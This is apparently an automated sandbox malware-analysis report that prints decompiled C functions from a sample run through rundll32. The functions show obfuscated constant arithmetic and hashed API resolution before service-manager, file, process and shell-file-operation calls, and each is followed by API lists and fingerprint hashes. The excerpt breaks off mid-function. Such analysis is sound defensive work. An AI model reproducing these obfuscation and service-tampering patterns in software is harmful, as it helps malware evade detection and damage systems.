                                                                                                                                                            				void* _t32;
                                                                                                                                                            				signed int _t34;
                                                                                                                                                            				int _t43;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_t43 = __ecx;
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t24);
                                                                                                                                                            				_v12 = 0x4657ea;
                                                                                                                                                            				_t34 = 0x1b;
                                                                                                                                                            				_v12 = _v12 / _t34;
                                                                                                                                                            				_v12 = _v12 ^ 0x000ac4f3;
                                                                                                                                                            				_v8 = 0xb5c996;
                                                                                                                                                            				_v8 = _v8 >> 4;
                                                                                                                                                            				_v8 = _v8 * 0x19;
                                                                                                                                                            				_v8 = _v8 + 0x3329;
                                                                                                                                                            				_v8 = _v8 ^ 0x01161fa0;
                                                                                                                                                            				E0038AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
                                                                                                                                                            				_t32 = OpenSCManagerW(0, 0, _t43); // executed
                                                                                                                                                            				return _t32;
                                                                                                                                                            			}










                                                                                                                                                            APIs
                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 003791A8
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ManagerOpen
                                                                                                                                                            • String ID: WF
                                                                                                                                                            • API String ID: 1889721586-2390014890
                                                                                                                                                            • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                                            • Instruction ID: 437d72c7bcf249edf535265df31f9fbf7eb2bffd28cb1e74599ec71f23f504ee
                                                                                                                                                            • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                                            • Instruction Fuzzy Hash: 27016971901208FBEB09DB95DD4ACAFBFB8EBC5714F108099F404A7200D3B55F109BA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 255 3742c4-374345 call 3820b9 call 38aa30 OpenServiceW
                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                            			E003742C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t24;
                                                                                                                                                            				void* _t29;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_t34 = __edx;
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t24);
                                                                                                                                                            				_v8 = 0x971c9e;
                                                                                                                                                            				_v8 = _v8 >> 3;
                                                                                                                                                            				_v8 = _v8 + 0xbdaa;
                                                                                                                                                            				_v8 = _v8 | 0x44f2c0c3;
                                                                                                                                                            				_v8 = _v8 ^ 0x44fb9439;
                                                                                                                                                            				_v12 = 0x762558;
                                                                                                                                                            				_v12 = _v12 | 0xdc63e739;
                                                                                                                                                            				_v12 = _v12 ^ 0xdc7b8d87;
                                                                                                                                                            				E0038AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
                                                                                                                                                            				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
                                                                                                                                                            				return _t29;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00384A8F,?,?,2635DC09), ref: 0037433F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: OpenService
                                                                                                                                                            • String ID: X%v
                                                                                                                                                            • API String ID: 3098006287-3430654708
                                                                                                                                                            • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                                            • Instruction ID: 6c46207559fe28baa97599cef596c3f07856948e3ad7111aaea0ffde47a6c397
                                                                                                                                                            • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                                            • Instruction Fuzzy Hash: A30104B281120CFBDF16DFD4D9468DEBF79EB14314F148189F90566221D2729B609B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 260 378f65-379010 call 3820b9 call 38aa30 CreateFileW
                                                                                                                                                            C-Code - Quality: 35%
                                                                                                                                                            			E00378F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                            				void* _t32;
                                                                                                                                                            				void* _t38;
                                                                                                                                                            
                                                                                                                                                            				_push(_a40);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_a32);
                                                                                                                                                            				_push(_a28);
                                                                                                                                                            				_push(_a24);
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t32);
                                                                                                                                                            				_v28 = 0xee6fdc;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v12 = 0x957ab3;
                                                                                                                                                            				_v12 = _v12 ^ 0x02d9a910;
                                                                                                                                                            				_v12 = _v12 + 0xffff8488;
                                                                                                                                                            				_v12 = _v12 ^ 0x02485b8e;
                                                                                                                                                            				_v8 = 0xf6b813;
                                                                                                                                                            				_v8 = _v8 + 0xffff9c70;
                                                                                                                                                            				_v8 = _v8 + 0xffff858c;
                                                                                                                                                            				_v8 = _v8 ^ 0x00f72129;
                                                                                                                                                            				E0038AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
                                                                                                                                                            				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
                                                                                                                                                            				return _t38;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00379009
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
• Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
• Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                                            • Instruction ID: 4ef644c63cb17270f9f96c97e70e737ff4730c415eded2b7f7e7ff7dfd550d8d
                                                                                                                                                            • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                                            • Instruction Fuzzy Hash: AD112B72900219FBCF229FE5DD098DFBFB5EF58354F118189F90862121C3328A61EB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 265 377f5d-377ff1 call 3820b9 call 38aa30 CreateProcessW
                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0037AD99,?,?,?,181C8C04,0037AD99), ref: 00377FEB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
• Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
• Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction ID: 0e077f6d55c0fc79e9b05ece8147445b89fe0ba675fe17c1794b1ecc8317ded7
                                                                                                                                                            • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction Fuzzy Hash: E011D672402118BBDF62AFD1DD09CDF7F79EF093A4F145144F91925121D2768A60EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 270 374ddd-374e73 call 3820b9 call 38aa30 SHFileOperationW
                                                                                                                                                            C-Code - Quality: 16%
                                                                                                                                                            			E00374DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				void* _t30;
                                                                                                                                                            				int _t38;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				signed int _t44;
                                                                                                                                                            				struct _SHFILEOPSTRUCTW* _t45;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t30);
                                                                                                                                                            				_v16 = _v16 & 0x00000000;
                                                                                                                                                            				_v24 = 0x8324bd;
                                                                                                                                                            				_v20 = 0xe59c0f;
                                                                                                                                                            				_v12 = 0xfa6a5a;
                                                                                                                                                            				_v12 = _v12 | 0x6fcfbea7;
                                                                                                                                                            				_t40 = 0x1a;
                                                                                                                                                            				_push(0x3771311d);
                                                                                                                                                            				_push(_t40);
                                                                                                                                                            				_v12 = _v12 * 0x42;
                                                                                                                                                            				_v12 = _v12 ^ 0xdff430a4;
                                                                                                                                                            				_v8 = 0x460bc4;
                                                                                                                                                            				_v8 = _v8 | 0x3946640e;
                                                                                                                                                            				_push(0xdf0d4f1a);
                                                                                                                                                            				_v8 = _v8 / _t40;
                                                                                                                                                            				_v8 = _v8 + 0x2a2;
                                                                                                                                                            				_v8 = _v8 ^ 0x023f16a4;
                                                                                                                                                            				_t44 = 0x58;
                                                                                                                                                            				E0038AA30(_t44);
                                                                                                                                                            				_t38 = SHFileOperationW(_t45); // executed
                                                                                                                                                            				return _t38;
                                                                                                                                                            			}













                                                                                                                                                            APIs
                                                                                                                                                            • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00374E6D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
• Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
• Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileOperation
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3080627654-0
                                                                                                                                                            • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                                            • Instruction ID: cf16629af539a33616f49a21373d06cf94cb9efecc183c86d9babfdf080eddca
                                                                                                                                                            • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                                            • Instruction Fuzzy Hash: C10139B5E01209FBDB14EFA4D9469DEBFB4EF80318F10C089E904AA251D3744B549B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E00375DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t21;
                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            				void* _t30;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            				void* _t33;
                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                            
                                                                                                                                                            				_t31 = __edx;
                                                                                                                                                            				_t34 = __ecx;
                                                                                                                                                            				E003820B9(_t21);
                                                                                                                                                            				_v12 = 0x9fac18;
                                                                                                                                                            				_v12 = _v12 ^ 0x90454497;
                                                                                                                                                            				_v12 = _v12 ^ 0x90d3245f;
                                                                                                                                                            				_v8 = 0x647eb;
                                                                                                                                                            				_v8 = _v8 >> 0xd;
                                                                                                                                                            				_v8 = _v8 >> 3;
                                                                                                                                                            				_v8 = _v8 + 0xffff0b9f;
                                                                                                                                                            				_v8 = _v8 ^ 0xfff54d3d;
                                                                                                                                                            				_t25 = E0038AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
                                                                                                                                                            				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
                                                                                                                                                            				return _t26;
                                                                                                                                                            			}













                                                                                                                                                            APIs
                                                                                                                                                            • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00375E58
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHandleInformation
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3935143524-0
                                                                                                                                                            • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                                            • Instruction ID: 9e4cb6cc1c812524f59df03c18050d80ee30f982738ed4ed13abd5011f3902e9
                                                                                                                                                            • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                                            • Instruction Fuzzy Hash: 5001BC76901308BBDB24DED0CC0AEEEBF74EF95314F108089F50466250D3B05B109BA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 280 371e22-371ea6 call 3820b9 call 38aa30 RtlAllocateHeap
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E00371E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t27;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            				signed int _t36;
                                                                                                                                                            				long _t42;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t42 = __ecx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t27);
                                                                                                                                                            				_v12 = 0x309d17;
                                                                                                                                                            				_v12 = _v12 | 0x1b560655;
                                                                                                                                                            				_v12 = _v12 ^ 0x1b78328a;
                                                                                                                                                            				_v8 = 0xa187d;
                                                                                                                                                            				_v8 = _v8 + 0xa972;
                                                                                                                                                            				_t36 = 0x67;
                                                                                                                                                            				_v8 = _v8 / _t36;
                                                                                                                                                            				_v8 = _v8 << 7;
                                                                                                                                                            				_v8 = _v8 ^ 0x000b519a;
                                                                                                                                                            				E0038AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
                                                                                                                                                            				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
                                                                                                                                                            				return _t34;
                                                                                                                                                            			}










                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,003780DB,?,00000000,AF136809), ref: 00371EA0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                                            • Instruction ID: b6be7ddf827da8a450fb84b786cca6038db036a2a8913b930a5e4fac4bfa0276
                                                                                                                                                            • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                                            • Instruction Fuzzy Hash: 60010476901208FBEB05DFD4DD4A8DE7BB5EB45354F208099F9086A211E7B29F20AB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 285 3846bb-38473b call 3820b9 call 38aa30 SHGetFolderPathW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E003846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				void* _t21;
                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            
                                                                                                                                                            				E003820B9(_t21);
                                                                                                                                                            				_v20 = 0x3f5bb0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v12 = 0x996874;
                                                                                                                                                            				_v12 = _v12 << 0xf;
                                                                                                                                                            				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                                                            				_v8 = 0xebf0af;
                                                                                                                                                            				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                                                            				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                                                            				_t25 = E0038AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                                                            				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                                                            				return _t26;
                                                                                                                                                            			}











                                                                                                                                                            APIs
                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00384735
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                                            • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction ID: 09782a1b4ea3e555b4518fdc90f4ed0ac16dda0e58b05b4e3be04706e9bb403c
                                                                                                                                                            • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction Fuzzy Hash: AF01EC75801218BBCF15AFD5DC498DFBFB8EF45394F108185F91866211D2758A60DBD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E003793ED() {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                            
                                                                                                                                                            				_v28 = 0xda6c64;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v12 = 0x88a564;
                                                                                                                                                            				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                                                            				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                                                            				_v8 = 0xd9241f;
                                                                                                                                                            				_v8 = _v8 * 0x5c;
                                                                                                                                                            				_v8 = _v8 + 0xccdd;
                                                                                                                                                            				_v8 = _v8 + 0x903;
                                                                                                                                                            				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                                                            				E0038AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 0037945B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction ID: 60a4d0680975cbf6830732f16911f82c1889d872f7ced8ab84c472361a29988a
                                                                                                                                                            • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction Fuzzy Hash: CEF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7745F459B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                            			E00388F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				int _t24;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t19);
                                                                                                                                                            				_v12 = 0xd87912;
                                                                                                                                                            				_v12 = _v12 >> 7;
                                                                                                                                                            				_v12 = _v12 ^ 0x0006adfb;
                                                                                                                                                            				_v8 = 0xf5ad8e;
                                                                                                                                                            				_v8 = _v8 + 0xc481;
                                                                                                                                                            				_v8 = _v8 >> 4;
                                                                                                                                                            				_v8 = _v8 ^ 0x00032ff7;
                                                                                                                                                            				E0038AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
                                                                                                                                                            				_t24 = CloseServiceHandle(_a12); // executed
                                                                                                                                                            				return _t24;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00389002
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandleService
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1725840886-0
                                                                                                                                                            • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                                            • Instruction ID: 91a8512992be115e742bfc980f6b6b1a51d04d6aae2e4160e8445efda78c8be0
                                                                                                                                                            • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                                            • Instruction Fuzzy Hash: 91F049B191020CFFDF06AFD4C94A89EBBB4EB10308F208198F80566611D6769B64EF51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                            			E00381F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				int _t25;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t19);
                                                                                                                                                            				_v12 = 0x96b134;
                                                                                                                                                            				_v12 = _v12 + 0xdeb4;
                                                                                                                                                            				_v12 = _v12 | 0x0c5d8169;
                                                                                                                                                            				_v12 = _v12 ^ 0x0cdc4dba;
